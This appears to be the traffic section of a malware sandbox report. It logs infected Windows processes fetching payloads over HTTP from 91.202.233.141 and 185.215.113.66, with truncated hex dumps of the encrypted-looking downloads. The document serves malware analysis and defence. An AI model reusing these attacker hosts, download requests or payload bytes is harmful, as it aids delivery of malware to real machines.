Oct 26, 2024 07:27:18.592250109 CEST	1236	IN	Data Raw: e6 e9 82 92 6e 08 a2 82 d5 22 03 be e5 e6 b1 9c ce a5 56 28 b7 34 20 91 c4 29 02 3a e8 6f 0b 36 17 36 17 17 e1 15 ff f0 f3 7d b0 18 6a 64 14 a9 8c 27 45 97 80 0f 10 09 b6 23 b7 ad 9c a7 46 85 d1 34 69 e7 e7 eb 9b 51 b6 18 bc 47 46 53 70 c9 d2 81 Data Ascii: n"V(4 ):o66}jd'E#F4iQGFSp[>l^^;>pN}Nq[`pqYyD%v`r5\|TV!9=c`GS@0LA\|\|yXP#!KC~}3PY'Cnu3o
Oct 26, 2024 07:27:18.592344999 CEST	1236	IN	Data Raw: e8 bb 20 bc d0 32 b3 5c 98 2e ea 23 57 95 d0 ea 2d 2c 41 a9 7c e1 c8 1d e8 32 6d 00 47 1b 4b f4 59 95 cf 83 8a 4e db f4 df e1 97 ca 8e 4b aa 09 11 ef b8 c2 f5 b6 31 f0 86 59 d7 20 07 d9 f6 ec f4 c4 4a 5d 9f bd 93 fe 99 1f 4c 07 0c c7 d2 c5 68 f9 Data Ascii: 2\.#W-,A\|2mGKYNK1Y J]Lh#S-<aa35f"2b66!sw-4[>s!3>p-rIqI[YH-_!%~aB+ZuQoCg/2y"GmaQV_Q
Oct 26, 2024 07:27:18.592351913 CEST	1236	IN	Data Raw: ca d6 cd b4 3f 6d f7 44 7b 25 8f c0 d5 e8 00 a5 bb 38 74 2f 4d 3c 02 ad d6 c4 0c e1 26 80 ef 26 2f ee cc 9e 88 d3 b3 30 3e 9b ce 98 4a 4b 6c 43 77 55 08 20 ca 2b 56 cb 92 ea 0f 79 aa 78 cf b8 9b 81 4d 05 b9 47 c5 52 83 eb 90 44 9f a1 ed 43 64 91 Data Ascii: ?mD{%8t/M<&&/0>JKlCwU +VyxMGRDCdO(aet~+;8%;p`CAvHJV{q; E5y!M>b"5:MHz{ET8RWC8/DaW-4/ib9t~;W
Oct 26, 2024 07:27:18.592359066 CEST	1236	IN	Data Raw: 53 98 8f 57 94 15 9b 7f bd 6f 8f ad c3 ae 9c db 22 b2 c0 29 c7 ef 7c eb 26 0c 1e e2 07 1a ca 60 c5 60 50 ab 7a ec 11 96 55 1c 14 95 ee d0 5d 76 c7 1e a9 c1 d3 0d 11 62 97 5c 6e 5f dc b2 46 d7 9b 37 00 24 c4 e5 d0 b9 c7 eb ac 2c c5 75 af 9c d9 dc Data Ascii: SWo")\|&``PzU]vb\n_F7$,u"IY/qC :<'.9Xt0PkPnR#W6E4h}_^1IghTzPh$\|SX@_~MjK(hS1N
Oct 26, 2024 07:27:18.592365026 CEST	1236	IN	Data Raw: 9b 31 cb e4 25 c4 6f 53 55 af e1 2d 6e 68 00 e5 3c f7 a1 83 72 62 95 54 40 60 3c b5 7c 74 57 35 0d d5 af 87 3a 55 ec 42 33 cb 52 4f 06 80 ea c5 0b 97 37 a2 b0 74 cf 13 a7 b6 2b ac e3 1c 83 3f e6 92 79 dd 93 41 73 99 2c 94 41 34 d4 48 82 98 cf d4 Data Ascii: 1%oSU-nh<rbT@`<\|tW5:UB3RO7t+?yAs,A4H*?]Uk4J;APA%WgIVO,OergeChK=@+4yQ3y?c(^u'7T<VIq\Wl
Oct 26, 2024 07:27:18.592370033 CEST	1060	IN	Data Raw: 03 06 77 11 5f c6 2f a8 d6 8b 46 50 7f c6 32 ec ab e0 f5 ee 3a 5e 66 8c 82 b4 2b 55 6f a0 c6 9d 17 6a cd c1 e9 5c 04 09 a2 4a b2 2d 95 ef fb 97 6f f9 71 1d 25 91 f3 9b b6 54 14 47 51 38 43 fb ef 01 4e 77 29 d6 29 17 37 ed 5e 27 ce e1 e1 6d b9 e8 Data Ascii: w_/FP2:^f+Uoj\J-oq%TGQ8CNw))7^'m.\|UGtFo{e-n.3i6'~]NLB7M1A(N]~RM**Wu_F27K Er@H%"!>w
Oct 26, 2024 07:27:18.597594976 CEST	1236	IN	Data Raw: 7f bf b9 80 52 e6 ec df 38 df ae 69 c1 6e 79 75 d7 c7 ce 11 83 a5 0e 7a a0 d1 35 e2 8e 2f a6 a5 76 fb af 55 7c 63 0c a9 91 2b 76 9f b1 e0 ec 7b b9 5b 97 03 ef e1 c1 bf de c8 bd d8 1f 3a 97 52 87 e3 2c 51 d8 2e 84 2f 43 bf e2 5b d8 08 aa 70 6c d4 Data Ascii: R8inyuz5/vU\|c+v{[:R,Q./C[plV.5y3qgq^`oqtb??x)"<0M79'?_BL-<"t~4]#zpzT7E1H#f$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49988	91.202.233.141	80	2236	C:\Users\user\AppData\Local\Temp\2311326414.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:23.540848017 CEST	182	OUT	GET /ALLBSTATAASASD HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:27:24.471875906 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:24 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49989	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:30.443917990 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:31.362966061 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:31 GMT Content-Type: application/octet-stream Content-Length: 110600 Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT Connection: keep-alive ETag: "66f3a94a-1b008" Accept-Ranges: bytes Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED] Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF\|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/\|"bWRoj(\|A,>?1;>"&;ucy[t`w #cdyysGx_ChI]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!nWG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 26, 2024 07:27:31.363034964 CEST	112	IN	Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3 Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
Oct 26, 2024 07:27:31.363068104 CEST	1236	IN	Data Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2 Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)\|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
Oct 26, 2024 07:27:31.363120079 CEST	1236	IN	Data Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c Data Ascii: LCLt.;{1h3]t.Eie\?\|6 : 3+`Se0L#}tK1(ss\|@a$@bWEgU4LlLAq5;z#@M8id8[y7pZN$S<[Z88Al5r6^9Cko+
Oct 26, 2024 07:27:31.363156080 CEST	1236	IN	Data Raw: 2c c0 09 b2 53 27 5c 5f 4b 92 e5 70 d1 58 a1 7e 68 f0 f8 2d 01 0b ae f2 ef 1d fd 76 3e 43 44 79 12 e8 03 d8 c6 49 d5 28 b9 14 42 6b 25 e2 aa ea b4 fb 50 1e bd 72 08 e3 be 09 fc 52 71 27 3f 1a 20 cd ab 85 b8 04 a4 b9 8a 0a 97 92 1d 0a c1 e5 9f d3 Data Ascii: ,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA\|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA
Oct 26, 2024 07:27:31.363188982 CEST	1236	IN	Data Raw: 70 7b bc f5 b5 3b dc 79 f2 61 41 e6 ae 67 58 ff 70 b0 e5 cb 23 20 e0 db 7f fa 3f 12 a7 b3 ab 9c b1 b0 7d d7 30 5f e3 1f 4c 49 ba 61 d9 ff c5 7b 13 b3 67 32 03 8a 4d b2 4c 32 29 a2 9b ae 38 f4 33 e5 76 c7 16 e4 5a e9 e9 58 3b 0d be 8c 7f fb 2a 4d Data Ascii: p{;yaAgXp# ?}0_LIa{g2ML2)83vZX;M#>}df(gz;OE\wd(afrc@(Q0BJG2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X7
Oct 26, 2024 07:27:31.363224983 CEST	848	IN	Data Raw: 63 34 fc c6 c6 48 5c d3 fa cd e0 9b f9 6c 0b 41 9e aa 09 76 cf 23 4e 60 27 cb f4 36 5a 5c 53 c7 11 93 42 4a 91 a7 00 c1 21 72 e2 97 f5 56 32 30 53 7b 88 7d cf 72 eb 02 1a 4c 1e ad 0a 8e 64 a4 61 ef cc e7 c7 64 2b 30 12 68 bd 09 18 7f e5 a2 82 1f Data Ascii: c4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@B
Oct 26, 2024 07:27:31.363276005 CEST	1236	IN	Data Raw: b1 33 43 be 4d d4 95 88 f6 3c e7 6b bd a1 ab e2 eb 23 dc ee 48 8e a3 9e 89 a2 8e 64 2d cb 04 01 d5 5f 71 c9 ac d6 e9 02 85 ef 6f be 4d f5 03 ed 99 b8 a4 78 2d cd 55 8c fe be bb 79 60 72 ee 28 34 fb 23 a1 f4 81 8e 66 a0 90 7c 97 cb 86 a7 7c 5a ff Data Ascii: 3CM<k#Hd-_qoMx-Uy`r(4#f\|\|ZL!eyhK?7IXih2%E+hJ ?O7OHaYKyL.$LDx=>.gAiwVjFp7s ;emO+"/;
Oct 26, 2024 07:27:31.363311052 CEST	1236	IN	Data Raw: 18 c6 ef 22 3d 9f 61 55 83 06 15 4e 9a c9 09 ee b7 6f 50 fa 82 b4 70 79 a3 b8 fa c9 b1 ae bd 40 d1 a1 8a de 55 90 a9 f4 24 c0 02 8d 93 66 d1 5e 0c 00 8b 7b 71 5b fc 42 13 48 51 f8 cb c1 3a cc 3e b2 3a 81 76 3c 09 44 6d 41 a7 85 a3 5b 0d 15 f8 4d Data Ascii: "=aUNoPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t~>,lmhPA~FEwOU{\|i1MnMXf{KE&.@0/:asZ>S+<h:!\|(
Oct 26, 2024 07:27:31.363374949 CEST	1236	IN	Data Raw: c4 e1 2c 89 1d 2b 2a 59 71 33 51 71 06 54 e2 53 ce ad 37 05 df aa 64 12 96 09 bf 24 9f 11 be bb b9 e6 36 6e 0f 18 5e b2 cc b9 b5 eb f3 08 20 6f 75 cb fe b7 6a bf b7 d6 aa dc 0f e1 7e 0d 30 8d 83 58 df 1d 76 18 81 ea bb 80 8a 41 24 45 19 71 0b e5 Data Ascii: ,+*Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7VtOl[cCS2r);->yxRC"f>+7&;Gp$nL`N#Hm
Oct 26, 2024 07:27:31.368818998 CEST	1236	IN	Data Raw: 33 ee 4e 57 d6 07 d8 98 34 cc 3a af b7 30 8d ce e7 54 9d 5d cb 86 c7 c3 8e b8 47 6c 03 b3 0e 5f 10 dc 1a be 1c 48 09 74 a7 09 b1 26 3a 14 c0 c3 87 55 c8 a3 50 85 bb 7d 75 7c 43 85 5f 19 2f 84 53 e0 c6 30 18 c1 27 c6 6e 21 43 3f 12 aa 93 9a 1f 97 Data Ascii: 3NW4:0T]Gl_Ht&:UP}u\|C_/S0'n!C??&ol@ &d'C(!S"EYDXW`IN6Z-C%"Zt1#=D&5 RxW=_yoY`2j"!UBMVGP%8x53=[(CM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49991	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:32.400298119 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:33.391685963 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:33 GMT Content-Type: application/octet-stream Content-Length: 110600 Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT Connection: keep-alive ETag: "66f3a94a-1b008" Accept-Ranges: bytes Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED] Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF\|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/\|"bWRoj(\|A,>?1;>"&;ucy[t`w #cdyysGx_ChI]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!nWG,6+uY9U4OP&?vKi>X7Dto=2f
Oct 26, 2024 07:27:33.391783953 CEST	112	IN	Data Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3 Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
Oct 26, 2024 07:27:33.391815901 CEST	1236	IN	Data Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2 Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)\|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
Oct 26, 2024 07:27:33.391865015 CEST	1236	IN	Data Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c Data Ascii: LCLt.;{1h3]t.Eie\?\|6 : 3+`Se0L#}tK1(ss\|@a$@bWEgU4LlLAq5;z#@M8id8[y7pZN$S<[Z88Al5r6^9Cko+
Oct 26, 2024 07:27:33.391901016 CEST	1236	IN	Data Raw: 2c c0 09 b2 53 27 5c 5f 4b 92 e5 70 d1 58 a1 7e 68 f0 f8 2d 01 0b ae f2 ef 1d fd 76 3e 43 44 79 12 e8 03 d8 c6 49 d5 28 b9 14 42 6b 25 e2 aa ea b4 fb 50 1e bd 72 08 e3 be 09 fc 52 71 27 3f 1a 20 cd ab 85 b8 04 a4 b9 8a 0a 97 92 1d 0a c1 e5 9f d3 Data Ascii: ,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA\|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA
Oct 26, 2024 07:27:33.391933918 CEST	1236	IN	Data Raw: 70 7b bc f5 b5 3b dc 79 f2 61 41 e6 ae 67 58 ff 70 b0 e5 cb 23 20 e0 db 7f fa 3f 12 a7 b3 ab 9c b1 b0 7d d7 30 5f e3 1f 4c 49 ba 61 d9 ff c5 7b 13 b3 67 32 03 8a 4d b2 4c 32 29 a2 9b ae 38 f4 33 e5 76 c7 16 e4 5a e9 e9 58 3b 0d be 8c 7f fb 2a 4d Data Ascii: p{;yaAgXp# ?}0_LIa{g2ML2)83vZX;M#>}df(gz;OE\wd(afrc@(Q0BJG2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X7
Oct 26, 2024 07:27:33.391968966 CEST	648	IN	Data Raw: 63 34 fc c6 c6 48 5c d3 fa cd e0 9b f9 6c 0b 41 9e aa 09 76 cf 23 4e 60 27 cb f4 36 5a 5c 53 c7 11 93 42 4a 91 a7 00 c1 21 72 e2 97 f5 56 32 30 53 7b 88 7d cf 72 eb 02 1a 4c 1e ad 0a 8e 64 a4 61 ef cc e7 c7 64 2b 30 12 68 bd 09 18 7f e5 a2 82 1f Data Ascii: c4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@B
Oct 26, 2024 07:27:33.392020941 CEST	1148	IN	Data Raw: de 08 bd c4 19 9e 4e 18 74 03 ea 99 59 4a 16 86 40 78 ea 1b 10 69 f6 7d 91 53 c3 cd 9b 8b cb 36 f4 a5 73 d7 81 ab 40 0c b5 0a 25 a6 99 65 cd fe a6 99 a6 20 08 9c 69 97 96 13 98 0d 05 fe 24 2b 9b c2 ff 27 07 e7 1b 4a c0 e9 a4 19 63 b3 d4 e2 f4 63 Data Ascii: NtYJ@xi}S6s@%e i$+'JccC{d,;HGj("IMHM;"C*@=jus%TO qU\`kqz(d];N_v3CM<k#Hd-_qo
Oct 26, 2024 07:27:33.392056942 CEST	1236	IN	Data Raw: d4 d9 78 d6 71 22 12 a0 26 ee 4c 98 92 fa 8b f7 60 62 d2 48 5b 9c 20 f3 ab a1 00 23 51 da cb 45 93 a3 0b c0 aa 32 dc 5d 20 9b af 53 0c de 0c 96 80 4e 52 82 a5 e3 34 73 ce 83 78 32 e8 77 f0 e5 9c fd 79 ba 01 1c c6 1c a8 8a 48 71 44 46 41 ed c4 2f Data Ascii: xq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1/v.
Oct 26, 2024 07:27:33.392086983 CEST	212	IN	Data Raw: 6b d8 19 b5 11 e3 cf 43 42 f3 d5 ce 94 74 d1 d3 7c c4 63 16 3f ed 3b 70 02 93 a7 7e cd b0 b8 dd ec 38 97 ef e3 7f e0 95 e6 c2 d1 10 46 bd 45 ad 21 31 a1 0f 83 2a 92 bc eb 76 df f7 99 a5 73 af bf 37 86 2e a1 30 64 13 75 3d 10 72 f2 99 87 46 57 75 Data Ascii: kCBt\|c?;p~8FE!1vs7.0du=rFWu&uLD,6\|< b&zhH}bt^%/m=ES/noaYQj% b/',P@zB%7O]N0}YZ2:
Oct 26, 2024 07:27:33.398207903 CEST	1236	IN	Data Raw: b1 48 b2 25 c1 ba 3e 25 fb b4 69 81 ab bd 29 75 ad b7 45 ea 4c e5 76 80 3b fa ec 7c 6f 7c 12 70 36 2d 91 1c 84 79 29 65 62 2a 42 9f 21 88 a8 e5 70 d0 fd 3b 67 61 4f 29 89 ec 5b 34 2e 01 91 1a 92 89 57 ab 91 7b bd 0e 36 99 52 80 c4 e1 2c 89 1d 2b Data Ascii: H%>%i)uELv;\|o\|p6-y)ebB!p;gaO)[4.W{6R,+Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7VtOl[cCS2r);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49993	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:38.242011070 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:39.164900064 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:39 GMT Content-Type: application/octet-stream Content-Length: 8960 Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT Connection: keep-alive ETag: "671230ee-2300" Accept-Ranges: bytes Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED] Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI\|<iq#O@5U\|{`)]Hx-dR~A}"2 +(Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi\|/>y4m3hO;<\|5,0tA`JNn;wesqT_:<fb7JH3& 